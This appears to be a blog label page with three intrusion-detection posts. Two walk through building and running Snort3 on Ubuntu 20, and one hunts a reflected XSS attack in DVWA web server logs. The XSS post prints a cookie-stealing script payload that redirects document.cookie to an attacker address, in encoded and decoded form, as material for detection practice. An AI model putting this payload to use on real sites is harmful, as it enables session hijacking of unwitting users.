Showing posts with label intrusion detection. Show all posts
Showing posts with label intrusion detection. Show all posts

Friday, February 5, 2021

Snort3 on Ubuntu 20 - The Initial Setup

Now that Cisco has released Snort3 via general availability, I decided to do a quick 4 part series on its installation, learning a little about Snort3, feeding the pig and Snort3 housekeeping.

Back in 2014, I did a post on "Building snort 3.0 (snort++)". With 6 years elapsing, I wanted to see what has changed with the installation and thus this new series.

Additionally and more importantly, I'm sure we will eventually transition the SANS SEC503 Intrusion Detection in Depth class to Snort3. When we do, I doubt whether we will show you how to install and configure Snort3. Thus this 4 part series and the associated reference materials below, are also being made available, so our SEC503 students are in a position to have the resources readily available, if and or when they choose to perform an install and or configuration of Snort3.

For this post, we will leverage my previous post in conjunction with Snort 3.1.0.0 on Ubuntu 18 & 20 - Configuring a Full NIDS & SIEM by Noah Dietrich from the snort.org website as well as additional information from other sources.

This is all based on a clean installation of Ubuntu 20 minimal install on VirtualBox.

1
2
3
4
5
6
securitynik@snort3:~$ lsb_release --all
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 20.04.1 LTS
Release:	20.04
Codename:	focal

Note: If you choose to install VirtualBox tools from the "CD", you may get an error about  "**This system is currently not set up to build kernel modules.". To resolve, this execute:

1
securitynik@snort3:~$ sudo apt install virtualbox-guest-utils virtualbox-guest-dkms

As always, we expect your system to be fully updated and hardened. There are various hardening guides online, such as those from the Center For Internet Security. However, to ensure your system is at least updated, run the following:

1
securitynik@snort3:~$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade -y

Depending on your install you may also need to install gcc and make

1
securitynik@snort3:~$ sudo apt-get install gcc make

Time if of great importance. To ensure your system time reflects your time zone, use the following commands. Note, also that you should consider taking advantage of NTP as I've done below, rather than manually configuring your time.

First list the available time zones

securitynik@snort3:~$ sudo timedatectl list-timezones
Africa/Abidjan
Africa/Accra
Africa/Algiers

....
America/Tijuana
America/Toronto
America/Vancouver
America/Whitehorse
America/Winnipeg
....

I will set mine as America/Toronto, while I set my time to UTC time and use a NTP server. Local time can be problematic when using NTP, as the time may not be properly updated during shifts to and from daylight saving time.

securitynik@snort3:~$ sudo timedatectl set-timezone America/Toronto
securitynik@snort3:~$ sudo timedatectl set-local-rtc False
securitynik@snort3:~$ sudo timedatectl set-ntp True

Verifying the time configuration.

securitynik@snort3:~$ sudo timedatectl 
               Local time: Wed 2021-01-27 11:14:29 EST 
           Universal time: Wed 2021-01-27 16:14:29 UTC 
                 RTC time: Wed 2021-01-27 16:14:29     
                Time zone: America/Toronto (EST, -0500)
System clock synchronized: yes                         
              NTP service: active                      
          RTC in local TZ: no

Do note, if you are monitoring intrusion events (via Snort, SIEM or any other tool) across different time zones, you are better off having your systems in UTC time. This makes it easy to correlate activities across these various time zones. 

With time properly configured, let's now install Snort3 by starting with its dependencies.

In my previous install, I did a lot of compiling of code. It looks like that is still the case at this time and will probably be that way for a while. I hope sooner rather than later, it is incorporated within a package manager.

Let's first create a directory to store our downloaded files

securitynik@snort3:~$ pwd
/home/securitynik
securitynik@snort3:~$ mkdir snort-files
securitynik@snort3:~$ cd snort-files/

Now that we are inside the snort-files folder, let's grab the pre-requisites.

securitynik@snort3:~/snort-files$ sudo apt-get install -y build-essential \ 
autotools-dev libdumbnet-dev libluajit-5.1-dev libpcap-dev zlib1g-dev \
pkg-config libhwloc-dev cmake liblzma-dev openssl libssl-dev cpputest \ 
libsqlite3-dev libtool uuid-dev git autoconf bison flex libcmocka-dev \
libnetfilter-queue-dev libunwind-dev libmnl-dev ethtool

Next install Safe C Library (safeclib) from GitHub.

securitynik@snort3:~/snort-files$ git clone https://github.com/rurban/safeclib.git
securitynik@snort3:~/snort-files$ cd safeclib/
securitynik@snort3:~/snort-files/safeclib$ build-aux/autogen.sh
securitynik@snort3:~/snort-files/safeclib$ ./configure && make && sudo make install

Next we install pcre-8.44 as specified so that we can leverage Hyperscan for fast pattern matching.

securitynik@snort3:~/snort-files$ wget https://ftp.pcre.org/pub/pcre/pcre-8.44.tar.gz
securitynik@snort3:~/snort-files$ tar --extract --verbose --gzip --file pcre-8.44.tar.gz
securitynik@snort3:~/snort-files$ cd pcre-8.44/
securitynik@snort3:~/snort-files/pcre-8.44$ ./configure && make && sudo make install

After pcre-8.44 we next install gperftools (originally Google Performance Tools)

securitynik@snort3:~/snort-files$ git clone https://github.com/gperftools/gperftools.git
securitynik@snort3:~/snort-files/gperftools$ cd gperftools
securitynik@snort3:~/snort-files/gperftools$ ./autogen.sh 
securitynik@snort3:~/snort-files/gperftools$ ./configure && make && sudo make install

Next up install Ragel State Machine Compiler. If you wish to install the latest version as of this writing which is 7.0.3, you will need to install Colm Programming Language. I stuck with version 6 as described in the Snort document as Colm produced some errors which I did not wish to spend much time troubleshooting .

securitynik@snort3:~/snort-files$ wget http://www.colm.net/files/ragel/ragel-6.10.tar.gz
securitynik@snort3:~/snort-files$ tar --extract --gzip --verbose --file ragel-6.10.tar.gz 
securitynik@snort3:~/snort-files$ cd ragel-6.10/
securitynik@snort3:~/snort-files/ragel-6.10$ ./configure && make && sudo make install

Next up, we download but DO NOT install boost c++ libraries. We also verify the file hash based on the SHA256 Hash from the website.

securitynik@snort3:~/snort-files$ wget https://boostorg.jfrog.io/artifactory/main/release/1.75.0/source/boost_1_75_0.tar.gz

securitynik@snort3:~/snort-files$ sha256sum boost_1_75_0.tar.gz 
aeb26f80e80945e82ee93e5939baebdca47b9dee80a07d3144be1e1a6a66dd6a  boost_1_75_0.tar.gz

securitynik@snort3:~/snort-files$ tar --extract --verbose --file boost_1_75_0.tar.gz

Let's grab Hyperscan.

securitynik@snort3:~/snort-files$ git clone https://github.com/intel/hyperscan
securitynik@snort3:~/snort-files$ cd hyperscan
securitynik@snort3:~/snort-files/hyperscan$ cmake -DCMAKE_INSTALL_PREFIX=/usr/local -DBOOST_ROOT=~/snort-files/boost_1_75_0/ ../hyperscan/
securitynik@snort3:~/snort-files/hyperscan$ make && sudo make install

Install flatbuffers

securitynik@snort3:~/snort-files$ git clone https://github.com/google/flatbuffers.git
securitynik@snort3:~/snort-files$ mkdir flatbuffers-build
securitynik@snort3:~/snort-files$ cd flatbuffers-build/
securitynik@snort3:~/snort-files/flatbuffers-build$ cmake ../flatbuffers
securitynik@snort3:~/snort-files/flatbuffers-build$ make && sudo make install

Next up, install the Data Acquisition Library (DAQ)

securitynik@snort3:~/snort-files$ git clone https://github.com/snort3/libdaq.git
securitynik@snort3:~/snort-files$ cd libdaq/
securitynik@snort3:~/snort-files/libdaq$ ./bootstrap 
securitynik@snort3:~/snort-files/libdaq$ ./configure && make && sudo make install

Wheewwww! That is a lot of pre-prequisites. Hopefully, they can package all of these up via package manager to make the install process easier. Note, if you don't install them in the order provided, you can expect to find one or more products complaining about dependency related to other products.

Finally, lets update the shared libraries.

securitynik@snort3:~$ sudo ldconfig

Now for the main course. Let's install Snort3. Because sometime after this install I would like to see what the command shell looks like, I'm also enabling that via the configure script along with the ability to process PCAPs over two Gigabytes.

securitynik@snort3:~/snort-files$ wget https://www.snort.org/downloads/snortplus/snort3-3.1.0.0.tar.gz
securitynik@snort3:~/snort-files$ tar --extract --verbose --gzip --file snort3-3.1.0.0.tar.gz 
securitynik@snort3:~/snort-files$ cd snort3-3.1.0.0/
securitynik@snort3:~/snort-files/snort3-3.1.0.0$ ./configure_cmake.sh --prefix=/usr/local --enable-tcmalloc  --enable-shell --enable-large-pcap  
securitynik@snort3:~/snort-files/snort3-3.1.0.0$ cd build/
securitynik@snort3:~/snort-files/snort3-3.1.0.0/build$ make && sudo make install

Once I run snort --version, we see wat seems to suggest we are good to go.

scuritynik@snort3:~$ snort --version

   ,,_     -*> Snort++ <*-
  o"  )~   Version 3.1.0.0
   ''''    By Martin Roesch & The Snort Team
           http://snort.org/contact#team
           Copyright (C) 2014-2020 Cisco and/or its affiliates. All rights reserved.
           Copyright (C) 1998-2013 Sourcefire, Inc., et al.
           Using DAQ version 3.0.0
           Using LuaJIT version 2.1.0-beta3
           Using OpenSSL 1.1.1f  31 Mar 2020
           Using libpcap version 1.9.1 (with TPACKET_V3)
           Using PCRE version 8.44 2020-02-12
           Using ZLIB version 1.2.11
           Using FlatBuffers 1.12.0
           Using Hyperscan version 5.4.0 2021-01-28
           Using LZMA version 5.2.4

Running a test using the default configuration, we see below Snort successfully validated the configuration (with 0 warnings).

securitynik@snort3:~$ snort -c /usr/local/etc/snort/snort.lua 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
Loading /usr/local/etc/snort/snort.lua:
Loading snort_defaults.lua:
Finished snort_defaults.lua:
Loading file_magic.lua:
Finished file_magic.lua:
	ssh
	hosts
	host_cache
	pop
	...
	stream_file
Finished /usr/local/etc/snort/snort.lua:
--------------------------------------------------
pcap DAQ configured to passive.

Snort successfully validated the configuration (with 0 warnings).
o")~   Snort exiting

Oink! Onik! Our piggy is preparing to fly. See you in the next post where we learn a little bit more about Snort3 before feeding it via rules and performing house keeping.


References:

https://www.snort.org/snort3

https://snort.org/documents

https://www.snort.org/downloads

https://www.securitynik.com/2014/12/building-snort-30-snort.html

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/003/979/original/Snort3_3.1.0.0_on_Ubuntu_18___20.pdf

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/175/original/Snort_3_Multiple_Packet_Threads_Processing.pdf

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/013/original/Snort_IPS_using_DAQ_AFPacket.pdf

https://www.youtube.com/watch?v=W1pb9DFCXLw&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-&index=1

https://askubuntu.com/questions/1140770/this-system-is-currently-not-set-up-to-build-kernel-modules-please-install-the

https://github.com/rurban/safeclib

https://www.hyperscan.io/

https://github.com/intel/hyperscan

https://github.com/gperftools/gperftools

https://www.colm.net/open-source/ragel/

https://www.boost.org/

http://google.github.io/flatbuffers/

https://www.snort.org/faq/readme-daq

http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node7.html

https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/023/original/ids2ips.txt

https://github.com/snort3/libdaq

https://snort-org-site.s3.amazonaws.com/production/release_files/files/000/016/344/original/snort_reference.html

https://snort-org-site.s3.amazonaws.com/production/release_files/files/000/016/343/original/snort_user.html

https://snort-org-site.s3.amazonaws.com/production/release_files/files/000/016/342/original/snort_devel.html

https://blog.snort.org/2015/03/basic-snort-usage.html

https://geekflare.com/nginx-error-while-loading-shared-libraries-libpcre-so-1/

https://usermanual.wiki/Document/snortmanual.1752822391.pdf

https://www.youtube.com/watch?v=PYP0YH2PVuo&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-&index=2

https://www.usenix.org/sites/default/files/conference/protected-files/nsdi19_slides_wang_xiang.pdf

Posted by at 8 comments:
Labels: , , , ,

Snort3 on Ubuntu 20 - Learning a little about our installation - Getting Help, Running Snort3, etc

In the previous post, we performed the install of Snort3. In this post, we learn a little about Snort3 before we start feeding it via rules and then perform some housekeeping.

Getting help!

securitynik@snort3:~$ snort --help

Snort has several options to get more help:

-? list command line options (same as --help)
--help this overview of help
--help-commands [<module prefix>] output matching commands
--help-config [<module prefix>] output matching config options
--help-counts [<module prefix>] output matching peg counts
--help-limits print the int upper bounds denoted by max*
--help-module <module> output description of given module
--help-modules list all available modules with brief help
....

To get help for a particular component, we can then say.

securitynik@snort3:~$ snort --help-commands
appid.enable_debug(proto, src_ip, src_port, dst_ip, dst_port): enable appid debugging
appid.disable_debug(): disable appid debugging
appid.reload_third_party(): reload appid third-party module
appid.reload_detectors(): reload appid detectors
host_cache.dump(file_name): dump host cache
...

To learn about the plugins

securitynik@snort3:~$ snort --list-plugins | more
codec::arp v0 static
codec::auth v0 static
codec::bad_proto v0 static
codec::ciscometadata v0 static
codec::erspan2 v0 static
codec::erspan3 v0 static
codec::esp v0 static
codec::eth v0 static
codec::fabricpath v0 static
codec::gre v0 static
....

To see some of the command line options available, you can look at the --help-options.

securitynik@snort3:~$ snort --help-options
-? <option prefix> output matching command line option quick help (same as --help-options) (optional)
-A <mode> set alert mode: none, cmg, or alert_*
-B <mask> obfuscated IP addresses in alerts and packet dumps using CIDR mask
-C print out payloads with character data only (no hex)
-c <conf> use this configuration
-D run Snort in background (daemon) mode
-d dump the Application Layer
-e display the second layer header info
-f turn off fflush() calls after binary log writes
-G <0xid> (same as --logid) (0:65535)
-g <gname> run snort gid as <gname> group (or gid) after initialization
-H make hash tables deterministic
-i <iface>... list of interfaces
...

While this system has tcpdump installed by default, let's also install TShark.

securitynik@snort3:~$ sudo apt-get install tshark

Using tcpdump I captured over 21,044 packets, using the following.

securitynik@snort3:~$ securitynik@snort3:~$ sudo tcpdump -n --interface enp0s3 -v -w securitynik-sample.pcap
tcpdump: listening on enp0s3, link-type EN10MB (Ethernet), capture size 262144 bytes
Got 1448

Got 1448
^C21044 packets captured
21044 packets received by filter
0 packets dropped by kernel

Using TShark, let's now see what is in this file.

securitynik@snort3:~$ tshark -n -r securitynik-sample.pcap -q -z io,phs
===================================================================
Protocol Hierarchy Statistics
Filter: 

eth                                      frames:21044 bytes:178288931
  ip                                     frames:20780 bytes:178275019
    udp                                  frames:851 bytes:118457
      dns                                frames:819 bytes:115601
      ntp                                frames:24 bytes:2160
      mdns                               frames:8 bytes:696
    tcp                                  frames:19929 bytes:178156562
      http                               frames:156 bytes:28081
        media                            frames:1 bytes:1448
          tcp.segments                   frames:1 bytes:1448
      tls                                frames:7855 bytes:164523943
        tcp.segments                     frames:7572 bytes:164188303
          tls                            frames:7555 bytes:163997610
  arp                                    frames:256 bytes:13056
  ipv6                                   frames:8 bytes:856
    udp                                  frames:8 bytes:856
      mdns                               frames:8 bytes:856
===================================================================

Doing some basic processing on the file with Snort3, we see 1 PCAP with 21,044 records received and analyzed, just as we captured. We also got information on the timing for the processing of these packets. Looks like Snort3 processed all 21,044 packets in under 1 second.

securitynik@snort3:~$  snort --pcap-list securitynik-sample.pcap 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
pcap DAQ configured to read-file.
Commencing packet processing
++ [0] securitynik-sample.pcap
-- [0] securitynik-sample.pcap
--------------------------------------------------
Packet Statistics
--------------------------------------------------
daq
                    pcaps: 1
                 received: 21044
                 analyzed: 21044
                    allow: 21044
                 rx_bytes: 16259569
--------------------------------------------------
codec
                    total: 21044       	(100.000%)
                 discards: 17392       	( 82.646%)
                      arp: 256         	(  1.216%)
                      eth: 21044       	(100.000%)
                     ipv4: 20780       	( 98.745%)
                     ipv6: 8           	(  0.038%)
                      tcp: 11046       	( 52.490%)
                      udp: 859         	(  4.082%)
--------------------------------------------------
Module Statistics
--------------------------------------------------
detection
                 analyzed: 21044
--------------------------------------------------
tcp
        bad_tcp4_checksum: 8071
--------------------------------------------------
udp
        bad_udp4_checksum: 430
        bad_udp6_checksum: 8
--------------------------------------------------
Summary Statistics
--------------------------------------------------
timing
                  runtime: 00:00:00
                  seconds: 0.486754
                 pkts/sec: 21044
                Mbits/sec: 124
o")~   Snort exiting

If you wish to dump contents of the PCAP file add the "-L dump" option or go even further by adding the "-d" to dump the application data. In this case I will add "-n" to only show 1 packet.

securitynik@snort3:~$ snort --pcap-list securitynik-sample.pcap -L dump -d -n 1 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
pcap DAQ configured to read-file.
Commencing packet processing
++ [0] securitynik-sample.pcap
pkt:1	
eth(DLT):  08:00:27:2A:BA:15 -> 52:54:00:12:35:02  type:0x0800
ipv4(0x0800):  10.0.2.15 -> 64.71.255.198
	Next:0x11 TTL:64 TOS:0x0 ID:55133 IpLen:20 DgmLen:86 DF

snort.raw[66]:
- - - - - - - - - - - -  - - - - - - - - - - - -  - - - - - - - - -
9F 59 00 35 00 42 4C 70  9C 9D 01 00 00 01 00 00  .Y.5.BLp ........
00 00 00 01 12 63 6F 6E  6E 65 63 74 69 76 69 74  .....con nectivit
79 2D 63 68 65 63 6B 06  75 62 75 6E 74 75 03 63  y-check. ubuntu.c
6F 6D 00 00 01 00 01 00  00 29 02 00 00 00 00 00  om...... .)......
00 00                                             ..
- - - - - - - - - - - -  - - - - - - - - - - - -  - - - - - - - - -

While reading back data from a PCAP file is cool, Snort3 is more than likely going to be running in live mode most of the time. Here is what it looks like once you decide to run snort from the command line.

First off, decide on the interface or interfaces you wish to capture traffic on. Here are my list of interfaces on my VM.

securitynik@snort3:~$  ip address show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:2a:ba:15 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute enp0s3
       valid_lft 59259sec preferred_lft 59259sec
    inet6 fe80::8adb:ccd9:2479:82c3/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:eb:40:cd brd ff:ff:ff:ff:ff:ff
    inet 10.0.0.116/24 brd 10.0.0.255 scope global dynamic noprefixroute enp0s8
       valid_lft 459sec preferred_lft 459sec
    inet6 fe80::2cf1:a00b:bcce:f58c/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

Let's tell Snort3 to capture traffic on the two non-loopback interfaces. Note, while I'm using two interfaces separated by colon, you can instead use 1 interface as would be the case on most installs of an IDS.

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8
[sudo] password for securitynik: 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
pcap DAQ configured to passive.
Commencing packet processing
++ [0] enp0s3:enp0s8
...

You might notice above that "DAQ configured for passive". To enable inline mode operations, leverage the -Q option within your configuration.

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8 -v -Q
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
--------------------------------------------------
Inspection Policy : policy id 0 : 
--------------------------------------------------
pcap DAQ configured to inline.
--------------------------------------------------
host_cache
    memcap: 8388608 bytes
Commencing packet processing
++ [0] enp0s3:enp0s8
Instance 0 daq pool size: 256
Instance 0 daq batch size: 64
...

You more than likely want to run snort in IDS or IPS mode. Thus you would take advantage of a configuration file. Let's use the default one which comes with Snort3 and which we used in the previous post.

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8 -v -Q -c /usr/local/etc/snort/snort.lua 
--------------------------------------------------
o")~   Snort++ 3.1.0.0
--------------------------------------------------
Loading /usr/local/etc/snort/snort.lua:
....

Finished /usr/local/etc/snort/snort.lua:
--------------------------------------------------
Inspection Policy : policy id 0 : /usr/local/etc/snort/snort.lua
--------------------------------------------------
.....
stream_tcp:
             flush_factor: 0
                  max_pdu: 16384
               max_window: 0
                   no_ack: disabled
            overlap_limit: 0
                   policy: bsd
              queue_limit: { max_bytes = 1048576, max_segments = 2621 }
         reassemble_async: enabled
             require_3whs: -1 (disabled)
          session_timeout: 30
           small_segments: { count = 0, maximum_size = 0 }
               track_only: disabled
--------------------------------------------------
stream_udp:
          session_timeout: 30
--------------------------------------------------
stream_user:
          session_timeout: 30
--------------------------------------------------
telnet:
        ayt_attack_thresh: -1
          check_encrypted: disabled
        encrypted_traffic: disabled
                normalize: disabled
--------------------------------------------------
wizard:
--------------------------------------------------
pcap DAQ configured to inline.
--------------------------------------------------
host_cache
    memcap: 8388608 bytes
Commencing packet processing
++ [0] enp0s3:enp0s8
Instance 0 daq pool size: 256
Instance 0 daq batch size: 64

Let's see now what the "--talos" option shows us. The Snort reference manual is not very verbose on this. It simply says it "enables Talos tweak", whatever that means. Additionally, instead of using "--talos", you can use "--tweaks talos".

securitynik@snort3:~$ sudo snort -i enp0s3:enp0s8 -Q -c /usr/local/etc/snort/snort.lua \
--tweaks talos --pcap-list securitynik-sample.pcap -R local.rules -q

##### securitynik-sample.pcap #####
	[1:1:0] Nik Testing (alerts: 2825)
#####
--------------------------------------------------
rule profile (all, sorted by total_time)
#       gid   sid rev    checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends
=       ===   === ===    ====== ======= ====== ========= ========= ========= ============= ======== ========
1         1     1   0      2908    2908   2825      1863         0         0             0        0        0

We see above information on our test rule. Not to worry, we will look at rules in the  next post where we feed the pig. Remember, rules gives the pig wings :-)

References:
















Posted by at No comments:
Labels: , , , ,

Saturday, February 4, 2017

Beginning Web Application Testing: Detecting Cross Site Scripting (XSS)–DVWA

In the Cyber Security investigation realm, “Indicators of Compromise” is a significant component in determining whether or not you have been compromised. Note it said “Indicators” it does not say yes or no you have been compromised. Smile

Those indicators come from primarily one of two sources, either the logs or the packets traversing the network. However, there are still other sources we can leverage that are based also on the host directly. Maybe information from the browser’s cache as we will see later or maybe the file system, registry or even a process running in memory.

For this detection, let’s focus on logs seen at the web server and the data in the client’s browser cache. I’ve copied the logs and stored them in the “/tmp” folder on Kali.

Let’s go hunting!!
First let’s take a look at the contents of the file we have.

The contents of the file above brings up a sad (my word) reality. Many of times you will have log files with tons of data and will not know where to start looking. This is exactly the reason why having indicators of compromise is important. However, for those situations when you don’t have a known bad, I will post a later blog entry on how you can go about detecting these.

Moving along!!
If we look at the log we can see lots of URL encoded entries. eg “%3Cscript%3E”. Let’s go through the logs to understand what is going on here. But first let’s extract a log entry and try to make sense of its structure.

10.0.0.1 - - [04/Feb/2017:13:34:12 -0500] "GET /dvwa/security.php HTTP/1.1" 200 5850 "http://10.0.0.102/dvwa/vulnerabilities/xss_r/?
name=+%3Cscript%3Ewindow.location%3D%27http%3A%2F%2F10.0.0.101%2FstealCookie.txt%3F%27%2Bdocument.cookie%3C%2Fscript%3E&user_token=f
dab3756ce90d020d8630cfcdadacfa7" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0"

There is a lot of information in this log entry which we can learn about from the previous blog on detecting web authentication brute forcing. For our purpose let’s use what is most helpful at this time.

From the reference (1) below, we know this log is in Apache’s “Combined Log Format” . As a result, we will pay attention to the “Request line from the client”

Analysis of the requests.
Looking first at the HTTP methods use, below we see  72 (the majority) of our requests uses the “GET” method. We also see 6 “POST” methods. Don’t be fooled and believe that you only need to focus on the ones with the most noise. When doing an investigations you should be more fearful of the things you see less of.

cat xss.log |  cut --fields 2 --delimiter "]" | cut --fields 1 --delimiter "/" | sort | uniq --count | sort --numeric –reverse





Looking closer at the “GET” method we see:
cat xss.log --number | grep --perl-regexp 'GET.*?"' --only-matching | sort | uniq --count | sort --numeric –reverse

Looking at above we see what seems normal and definitely what seems abnormal from the “GET” Methods used. There seems to be 8 entries which are URL encoded.

Let’s now turn to our friend Python3 “urllib” to help us solve one of these problem.

Decoding “GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.location%3D%27http%3A%2F%2F10.0.0.101%2FstealCookie.txt%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1"

Python3 to the rescue.

From the above it seems the user executed “<script>window.location='http://10.0.0.101/stealCookie.txt?'+document.cookie</script>” in the “name” parameter field.

Obviously we would want to go through each of those to see what was sent. However, I believe if you have reached this far in reading this, then you should have gotten the picture.

Before we go …
let’s assume we had access to the client that made this request. If we look at the logs above, we already know this user “seems” to be using FireFox. Let’s assume that assumption is correct, we could take a look at the FireFox “cache” to see if this user did make this request to correlate this back to our logs.

The image below shows what this would look like.

Well that’s all folks!!!

Reference:
1. Apache Log Files
2. 21.8. urllib.parse — Parse URLs into components
Posted by at No comments:
Labels: , , , ,
Subscribe to: Posts (Atom)